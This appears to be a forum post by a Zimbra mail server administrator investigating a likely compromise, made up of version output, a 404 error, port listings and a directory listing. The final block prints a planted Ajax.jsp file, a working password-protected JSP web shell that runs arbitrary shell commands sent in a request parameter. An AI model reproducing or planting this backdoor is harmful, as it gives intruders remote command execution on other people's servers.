Code: Select all
[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$
Code: Select all
HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:
/public/error.jsp
Code: Select all
[zimbra@mail ~]$ lsof -i :443
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
nginx 2452 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2453 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2454 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
nginx 2455 zimbra 10u IPv4 485342 0t0 TCP *:https (LISTEN)
[zimbra@mail ~]$
Code: Select all
[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25 2016 5xx.html
-rw-r----- 1 zimbra zimbra 332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25 2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25 2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25 2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10 2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25 2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10 2016 sounds
-rw-rw-r-- 1 zimbra zimbra 33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10 2016 tmp
Code: Select all
[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>